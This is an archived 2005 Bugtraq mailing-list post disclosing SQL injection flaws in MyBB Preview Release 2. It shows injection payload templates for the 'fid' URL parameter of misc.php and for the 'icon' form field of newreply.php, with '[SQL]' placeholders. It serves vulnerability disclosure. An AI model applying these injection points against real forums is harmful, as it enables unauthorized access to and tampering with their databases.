[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: SQL Injection[2] In MyBB PR2
From: stranger-killer () hotmail ! com
Date: 2005-09-07 10:32:05
Message-ID: 20050907103205.21148.qmail () securityfocus ! com
[Download RAW message or body]
Hello ..
The Injected File : misc.php , newreply.php
Discovered by: Devil-00
Injected Versions :-
MyBB Preview Release 2
misc.php :-
[CODE]
http://site/misc.php?action=rules&fid=-1' [SQL]
[/CODE]
newreply.php :-
[CODE]
Do Preview By FireFox And Edit Header ;)
Content-Disposition: form-data; name="icon"\r\n
\r\n
-1') [SQL] /*\r\n
[/CODE]
GreeTz For Security4Arab Team And HACKERS PAL And ABDUCTER
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic